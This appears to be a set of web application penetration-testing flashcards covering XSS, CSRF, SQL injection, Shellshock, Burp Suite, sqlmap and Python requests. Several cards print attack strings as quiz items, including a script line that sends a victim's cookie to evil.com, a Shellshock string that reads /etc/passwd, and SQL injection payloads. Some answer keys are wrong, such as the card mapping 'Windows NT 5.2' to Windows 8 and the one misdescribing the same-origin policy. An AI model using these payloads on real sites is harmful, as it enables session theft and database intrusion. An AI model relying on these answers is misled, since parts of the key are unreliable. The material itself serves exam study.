Test Flashcards

1
Q

Why is the AJAX attack surface larger than that of static web pages?

A

Client-side code is included.

2
Q

Which configuration option is used to select specific HTTP request parameters to modify when launching an attack with Burp Intruder?
1. Repeater
2. Target
3. Payloads
4. Positions

A
Positions
3
Q

What is the flag for minimum word length in cewl?

A

cewl -m #

4
Q

An attacker sends a link to a victim that contains a website URI and a session ID. The victim clicks the link and authenticates. What kind of attack is this setting up?
1. Session prediction
2. Cross site scripting
3. Cross site request forgery
4. Session fixation

A

Session Fixation

5
Q

Which of the following document objects contains hidden values and Cross-Site Request Forgery tokens which the web application developer would not want to be displayed on the web page?
1. Cookie
2. Forms
3. Tables
4. Referrer
5. URL

A

Forms

6
Q

A user of the MySocialMedia.com site receives the following link in an email. Which of the following would prevent this type of attack?
1. Requiring client certificates
2. Use parameterized queries
3. Generate unique tokens
4. Set the Secure flag on cookies

A

Generate unique tokens

7
Q

Which snippet would most likely be found in an HTML injection attack?
1. alert("Success")
2. <form action="http://2.4.3.5/login.htm">Password: <input></input></form>
3. <embed src='http://example.com/demo.swf'></embed>
4. <?php include("inc/".$_GET['file']);?>

A

<form action="http://2.4.3.5/login.htm">Password: <input></input></form>
8
Q

Which of the following is recommended for centralized web server and application logging?
1. Synchronize each system that generates logs with NTP
2. Convert logs to UTC time once received by the central repository
3. Synchronize NTP with the local time of each system that generates logs
4. Convert time stamps to epoch format once received by the central repository

A

Synchronize each system that generates logs with NTP

9
Q

A penetration tester is doing passive recon and needs to determine the IP address of the target's primary web server. Which of the following would reveal the IP address for the server www.sans.org?
1. authlookup www.sans.org
2. nslookup www.sans.org
3. resolve www.sans.org
4. whois www.sans.org

A

nslookup www.sans.org

10
Q

Which database schema uses all_tables?

A

Oracle Database

11
Q

Which is a control against tampering with the session ID?
1. Including a hash of the username as part of the session ID
2. Using both alphabetic and numeric characters in the session ID
3. Changing the session ID after the user reloads the page
4. Sending the session ID to the user as part of the cookie

A

Changing the session ID after the user reloads the page

12
Q

What attack is this?
http://www.earth.com/gui/?action=add=url&s=/http://evilesite.com/union.torrent

A

Cross Site Request Forgery

13
Q

What attack is this?
www.wind.com/login.php?id=1%27%20waitfor%20%delay%20%2700:00:15%27–

A

SQL Injection (waitfor delay 00:00:15 --), URL-encoded

14
Q

What attack is this?
www.fire.com/page.asp?pageid=10&lang=eng&Title<h1>1=1<\script>
A

cross site scripting

15
Q

What describes the relationship between successful inline SQLi and reflected XSS?
1. Tester inputs special characters into cookies
2. Takes advantage of a website that trusts the user's browser
3. In both cases results are displayed to the user
4. Session ID must match between the request and the response

A

In both cases the results are displayed to the user

16
Q

What Python requests.get() attribute shows if a server returned an error?
1. print (pageload.headers)
2. print (pageload.stderr)
3. print (pageload.txt)
4. print (pageload.status_code)

A

print (pageload.status_code)

17
Q

What must match to use a UNION SELECT statement in a SQLi test?

A

The number of columns returned must match the number of columns in the original SELECT statement

18
Q

What vulnerability is this?
HTTP/1.1 401 Authorization Required WWW-Authenticate: Digest realm=sans.org

1. LDAP injection is possible due to Windows authentication
2. HTTP headers contain a weakly encoded username and password
3. Password guessing attacks are possible due to lack of lockout
4. Client requests contain digital signatures that can be spoofed

A

Password guessing attacks are possible due to lack of lockout
19
Q

What MySQL function reads a file located on the DB server as part of an SQLi attack?
1. sp_configure
2. Bulk Insert
3. load_file
4. Copy
5. utl_file

A

3. load_file

20
Q

What tool is useful for finding information about the technologies in use by a website, the server OS, the netblock owner, and historical information about the site?
1. Qualys server test
2. Netcat
3. Shodan
4. Netcraft

A
Netcraft
21
Q

What tool would be used to import web service APIs prior to a penetration test?

A

Postman

22
Q

What Python construct can be used to iterate through an entire list of values without reference to individual indexes?
1. Case Statement
2. While loop
3. If Statement
4. For loop

A
For loop
23
Q

Why would an attacker avoid using the DOM object shown below if he was trying to hijack a user's session to www.bank.com?
location = 'http://www.evil.com/evil_script/evil.php?='+document.cookie
1. It would redirect the victim's browser to a different web page
2. The script would steal cookies from the wrong web site
3. The script would be unable to read data in hidden fields
4. It would prompt the user to re-enter his account information

A
It redirects to evil.com
24
Q

How do you enumerate a database for valid users in sqlmap?

A

sqlmap -u "http://www.site.com" --users

25
Q

Which could be successful if used to initiate a SQLi attack against a web app with little or no input filtering?
1. -- or 1=1
2. " or 1=2
3. <"Yes"="Yes
4. 'or'John'='john
5. 'or 2<1 --

A

'or'John'='john
26
Q

What command switch could be added to wget to force cataloguing pages that are referenced in the robots.txt?
1. -e robots=off
2. -e cache
3. -e index
4. -e follow

A
-e robots=off
27
Q

What is the Linux syntax to read a base64-encoded file?

A

cat filename.txt | base64 -d

28
Q

What makes the tool sqlmap an attractive blind SQL injection utility?
1. It runs on systems that support Python and is highly effective
2. It is bundled with Grendel-Scan and includes an interception proxy
3. It is bundled with the Burp Suite and utilizes the Google cache
4. It targets Microsoft SQL Servers and runs solely in VBS code

A

It runs on systems that support Python and is highly effective
29
Q

Which of the following will give an attacker the web root directory and the UID of the web server?
1. www.giac.org/robots.txt
2. www.mysite.com/phpinfo.php
3. HTTP_USER_AGENT environment variable
4. /usr/bin/id command

A
www.mysite.com/phpinfo.php
(phpinfo.php reveals:
- PHP configuration file and directory plus underlying directory structure
- Username and UID of the web server
- Web root location
- Version of software, such as MySQL)
30
Q

Which readyState value indicates that an XMLHttpRequest issued the HTTP request over the network?
4
3
2
1

A

2
(XMLHttpRequest)
0=Unsent
1=Opened
2=Sent
3=Loading
4=Done

31
Q

Removing known-bad characters from user input to a web application helps prevent which of the following?
1. Cross-Site Scripting
2. Block-list filtering
3. Cross-Site Request Forgery
4. Session Hijacking

A

1. Cross-Site Scripting
(Removing known-bad input characters, which is itself known as block-list filtering, helps prevent XSS attacks.)

32
Q

What HTTP status code means "Switching Protocols" and is commonly used by WebSockets?
1. 100
2. 101
3. 200
4. 302
5. 304
6. 401
7. 404
8. 500
9. 502

A
101
33
Q

This is a legitimate (non-forged) user-agent string:
Mozilla/5.0 (Windows NT 5.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.166.7.0 Safari/537.36
What is the client OS?
1. Windows 10
2. Windows 7
3. Windows 8
4. Windows 8.1
5. Windows Vista
6. Windows XP

A
Windows 8
34
Q

Examine the following string:
() { 42;};echo;/bin/cat /etc/passwd
What is the name of the vulnerability this string is attempting to exploit?

A

Shellshock

35
Q

Which Burp Suite fuzzing attack type fuzzes each position, one at a time?
1. Battering Ram
2. Cluster Bomb
3. Pitchfork
4. Sniper

A

Sniper
36
Q

Here is the dig PTR (reverse) DNS lookup:
dig 23.1.16.19.in-addr.arpa PTR
What is the simplified syntax of this command?
1. dig -p 19.16.1.23
2. dig -ptr 19.16.1.23
3. dig -4 19.16.1.23
4. dig -x 19.16.1.23

A
dig -x 19.16.1.23
37
Q

What property of the XMLHttpRequest object provides information about the state of the server’s response to a request sent via XMLHttpRequest?

A

readyState

38
Q

What type of attack is this?
<img src="http://ex.com/transfer.php?amount=1000.0&to_account=29520311">
1. Commandline injection
2. CSRF
3. SQL Injection
4. XSS
5. Iframe Injection

A
CSRF
39
Q

What is the ANSI SQL-92 standard schema that provides a way to easily query the names of databases, tables, and even columns? It is supported by both Microsoft SQL Server and MySQL, but not Oracle, DB2 or SQLite.

A

information_schema

40
Q

What color icon does BeEF use to indicate "the command module works against the target, but may be visible to the user"? Answer with one word, first letter capitalized. For example: "Black" without the quotes.

A

Orange

41
Q

Which of the following options can be set to prevent XSS from stealing cookie data?
1. HTTPOnly = True
2. SecureFlag = True
3. Hidden from fields = True
4. CookieReadOnly = False

A
HttpOnly = True
42
Q

Which of the following is most likely to be the victim of an XSS vulnerability?
1. Web applications
2. Host systems
3. End Users
4. System administrators

A
End Users
43
Q

Which of the following attacks bypasses traditional server-side security controls such as input sanitization or IDS?
1. Persistent XSS
2. DOM-based XSS
3. Reflected XSS
4. Stored XSS

A
DOM-based XSS

In traditional reflected and stored XSS the goal is for the attacker to get the server side of the application to deliver the malicious JavaScript to the client.

44
Q

What type of XSS does not need to first deliver payload to the server?
1. DOM-based XSS
2. Stored XSS
3. Self-XSS
4. Reflected XSS

A
DOM-based XSS
45
Q

With respect to HTTP request methods, which of the following is considered unsafe as well as non-idempotent?
1. HEAD
2. GET
3. POST
4. PUT

A

POST
(Repeated submissions of an idempotent method yield the same end server state:
- Idempotent methods: GET, HEAD, PUT, DELETE, OPTIONS
- Non-idempotent methods: POST, PATCH)

46
Q

Which of the following MITRE database searches can prove useful for discovering information leakage and related flaws?
1. CVEs referencing "flaws"
2. CVEs referencing "directory"
3. CVEs referencing "exposures"
4. CVEs referencing "transparent"

A

CVEs referencing "directory"
47
Q

The most common way to attempt to discover SQL input processing flaws within a web application with a back-end database is to do what?
1. Inputs that are likely to cause an error from the JBoss app server
2. Inputs that are likely to cause parsing errors on the web page server engine
3. Inputs that are likely to cause an error on the operating system
4. Inputs that are likely to cause a database processing error

A

Inputs that are likely to cause a database processing error
48
Q

What kind of attack was used by malicious parties in the Drupalgeddon exploit?
1. LFI
2. SQL Injection
3. CSRF
4. Stored XSS

A

SQL Injection
SQL injection, specifically unauthenticated SQL injection, was used in the Drupalgeddon attack. Exploitation of this vulnerability, which proved straightforward, would provide adversaries unfettered access to the entire CMS, potential for privilege escalation, and the ability to execute arbitrary PHP. Drupal gave this vulnerability its highest (worst) possible rating. Book 5 Page 73

49
Q

Burp provides three levels of confidence for its findings. What is the lowest level of confidence that Burp assigns to vulnerabilities?
1. Low
2. Weak
3. Minimal
4. Tentative

A

Tentative

50
Q

Burp provides three levels of confidence for its findings. What is the highest level of confidence that Burp assigns to vulnerabilities?
1. Verified
2. Certain
3. High
4. Confirmed

A

Certain

51
Q

What data structure does r.headers return in the following code?

r = requests.get('http://www.sec542.org')
print(r.headers)
1. Dictionary
2. List
3. String
4. Integer

A

Dictionary

52
Q

#!/usr/bin/python3

What is the output of the following Python program?

s = {1:'a', 2:'b', 3:'c'}
print (len(s))
1
3
6
0

A

3

"s" defines a dictionary with three key:value pairs. The len() function counts the number of pairings within a dictionary, in this case 3. Book 5 Page 30

53
Q

Which of the following flaws is exploited by a CSRF attack?

  1. Lack of a dynamic element in a transaction
  2. Lack of authentication of a transaction
  3. Lack of user input validation
  4. Lack of authorization of a transaction
A
Lack of a dynamic element in the transaction

Lack of authentication/authorization is not applicable as the attack requires the “victim” to be “logged in.” Similarly, lack of user input validation is not applicable as the attack does not rely on modification of user input such as in the case of an SQL injection attack. Book 5 Page 8

54
Q

#!/usr/bin/python3

What output is generated from the following Python program?

t = 1
for a in [2,4]:
    t = t + a
print (t)

10
7
3
6

A

7

The for loop iterates on the list containing two elements (2 and 4). Adding them to the initial value of t, 1, results in a final result of 7. Book 5 Page 29

55
Q

Short POST options can be sent via a parameter called data in the requests.post() function. What type of data structure is the data parameter?

  1. List
  2. Dictionary
  3. String
  4. Tuple
A
Dictionary

POST options are sent via a dictionary called data in {'variable':'value'} format. Multiple variables can be passed: data = {'variable1':'value1', 'variable2':'value2'}. Book 5 Page 34

56
Q

What must be set when using requests if a site is using a self-signed X.509 certificate?

A

verify=False

57
Q

What is the purpose of same-origin policy?

  1. To allow use of scripts across websites where there is a common domain name. This allows scripts to be run from the Origin webserver and any server that shares the root domain name of the server.
  2. To prevent a website’s scripts from accessing and interacting with scripts used on other servers unless all of the script content came exclusively from the Origin server.
  3. To prevent a website’s scripts from accessing data used on other websites unless the script content came from the Origin website or the script content was linked to on other websites.
  4. To allow use of scripts across websites where there is a common IP subnet. This allows scripts to be run from the Origin webserver and any server that shares the IP subnet as the server.
A
To allow use of scripts across websites where there is a common domain name. This allows scripts to be run from the Origin webserver and any server that shares the root domain name of the server.
58
Q

Which of the following best describes the use of UNION-based SQL injection when trying to test an application for SQL injection vulnerabilities?

  1. It allows the attacker to queue multiple database queries in different web sessions with the application, with the last session causing triggering of all queued DB statements to be executed together.
  2. It allows the attacker to pull error information for both the database and application server and combine the results into a single output.
  3. It allows the attacker to pull information from multiple tables, using two or more SELECT statements, and to combine the results into a single table with a UNION operator, all in a single command.
  4. It allows the attacker to pull information from multiple tables by taking results of two or more separately executed SELECT statements and combining them.
A
It allows the attacker to pull information from multiple tables, using two or more SELECT statements, and to combine the results into a single table with a UNION operator, all in a single command.
59
Q

Per the OWASP Testing Guide, which of the following is known as an HTTP verb tampering attack?
1. Alter request parameters
2. Change request payload
3. Change request method
4. Manipulate query string

A
Change request method